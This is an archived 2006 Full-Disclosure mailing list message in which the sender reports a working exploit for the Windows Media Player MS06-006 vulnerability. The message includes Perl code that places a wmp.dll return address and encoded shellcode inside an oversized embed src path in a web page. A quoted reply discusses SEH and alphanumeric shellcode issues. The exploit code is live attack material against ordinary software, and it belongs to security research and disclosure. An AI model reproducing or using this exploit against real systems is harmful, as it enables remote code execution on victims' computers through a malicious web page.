lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <200602161941.05387.fdlist@digitaloffense.net>
Date: Fri Feb 17 01:41:15 2006
From: fdlist at digitaloffense.net (H D Moore)
Subject: MS06-06 Windows Media Player Exploitation

Got it working finally :-) The alpha shellcode stuff is actually 
Skylined's (ported to perl), the non-alpha prefix is only used if you 
dont pass GETPCTYPE=win32 for PexAlphaNum or GETPCTYPE=seh for Alpha2. I 
am using an address in wmp.dll (v9) and tested it successfully on Firefox 
and Opera. Time to start porting to v10 and have it auto-detect the WMP 
version. Keep your SRC path less than 4K or you end up smashing the PEB's  
module list pointers (at least with Firefox)...

-HD

<code>
my $addr = 0x07694b1e; # wmp.dll v9.00.00.2980
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $pattern   = Pex::Text::AlphaNumText(4096);

substr($pattern, 2082, 4,   "ABC=");       # inc, inc, inc, cmp eax, [ptr]	
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($shellcode), $shellcode);

my $content   = "<html><body><embed type=\"application/x-mplayer2\" 
src=\"$pattern.wmv\"></body></html>";
</code>

On Thursday 16 February 2006 19:15, c0ntex wrote:
> On 16/02/06, H D Moore <fdlist@...italoffense.net> wrote:
> > Still getting some annoying crashes (SEH trick in alphanum code is
> > annoying when you are trying to debug something...), but the basic
> > solution is:
>
> Ye, we are on the same path if you looked at my notes, SEH works
> flawlessly and can redirect no problem, but getting the stable
> location to have it go is the problem. I had to reject the "pass
> shellcode in the src="" method as I am finding your Alpha shellcode
> skechy and not 100% alpha :p due to the FF and other annoying
> characters, which cause it to bork.
>
> I'm working on another method which is looking more realistic but I
> need to wait til tomorrow now as I need to sleep  :)
>
> --
>
> regards
> c0ntex

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ